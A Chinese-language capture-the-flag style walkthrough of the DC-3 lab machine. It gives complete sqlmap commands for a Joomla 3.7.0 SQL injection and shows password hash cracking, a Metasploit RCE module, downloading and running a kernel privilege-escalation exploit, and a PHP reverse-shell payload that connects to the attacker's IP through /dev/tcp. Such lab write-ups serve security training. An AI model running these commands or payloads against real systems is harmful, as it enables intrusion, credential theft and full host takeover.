一、实验环境
攻击机(kali): 192.168.189.148靶机(ubuntu16.04): 192.168.189.182
靶机下载地址:/entry/dc-32,312/
二、信息收集
1、使用nmap扫描存活主机
2、发现IP192.168.189.182开放80端口,再对其进行nmap扫描
nmap -sV -A -T4 192.168.189.182
3、通过扫描结果我们发现其指纹信息为joomla,访问其80端口
4、使用dirsearch对其进行目录扫描
dirsearch -u http://192.168.189.182/ -e php
5、发现后台为/administrator,并且在readme.txt文件中发现joomla版本为3.7
三、漏洞利用
1、本来是想直接用msf来进行漏洞利用,但是这个靶机msf中的漏洞模块都不能进行直接的利用
2、然后我在exploitdb中搜索到了joomla3.7.0版本相关的漏洞
3、在对应的文件中我们发现了漏洞利用的payload
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
4、直接上sqlmap
爆数据库名
sqlmap -u "http://192.168.189.182/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
爆表名
sqlmap -u "http://192.168.189.182/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]
爆列名
sqlmap -u "http://192.168.189.182/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T users --columns -p list[fullordering]
爆数据
sqlmap -u "http://192.168.189.182/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" -C name,password --dump -p list[fullordering]
5、这里我们获得了一个账号密码,但由于密码是加密的,需要对其进行解密,我们可以利用john来进行破解
john pass
6、得到密码为snoopy,我们使用账号和密码登录后台
7、在之前用msf进行漏洞利用时,虽然失败了,但是其中有个漏洞模块在利用失败后提示
Exploit aborted due to failure: unknown: 192.168.189.182:80: No logged-in Administrator or Super User user found!攻击因失败而中止:未知:192.168.189.182:80:未找到登录的管理员或超级用户!
那现在我们已经登录了管理员账号是不是就可以直接进行利用了呢?
8、利用MSF进行漏洞利用,并成功收到反弹会话(nice!)
use exploit/unix/webapp/joomla_comfields_sqli_rce set rhosts 192.168.189.182run
四、权限提升
DC-3靶机只有一个flag,并且是在/root目录下,所以我们还是得进行提权(根据网站首页的提示就知道需要提权!)
1、在SUID,脏牛等漏洞利用失败后,想到了利用系统漏洞提权
利用python起一个交互式页面
python -c "import pty;pty.spawn('/bin/bash')"
收集系统信息
cat /proc/version #查看内核版本信息
2、搜索对应版本的漏洞
searchsploit ubuntu 16.04
3、查看其exp(39772.txt)
4、给出了exp下载地址及其利用方法,将exp下载到kali,使用msf将其上传到靶机
wget /offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zipuzip 39772.zip
5、上传成功之后,在靶机执行该exp
tar -xvf exploit.tar cd ebpf_mapfd_doubleput_exploit./compile.sh./doubleput
5、成功拿到root权限
6、成功拿到flag
补充:
在我们登录了网站后台之后,也可以直接反弹一个shell到我们的kali
1、创建一个反弹shell的文件
<?phpsystem("bash -c 'bash -i >& /dev/tcp/192.168.189.148/8888 0>&1' ");?>
2、在kali开启监听,访问该文件即可收到反弹shell
3、拿到shell,后续就是同样的操作了。
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程)](https://1200zi.500zi.com/uploadfile/img/15/14/fb8e8a23225820cb3fe9c72565596c4a.jpg)
![[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)](https://1200zi.500zi.com/uploadfile/img/15/148/5e51fe8ed0db3fa665ef6cadff7654fe.jpg)
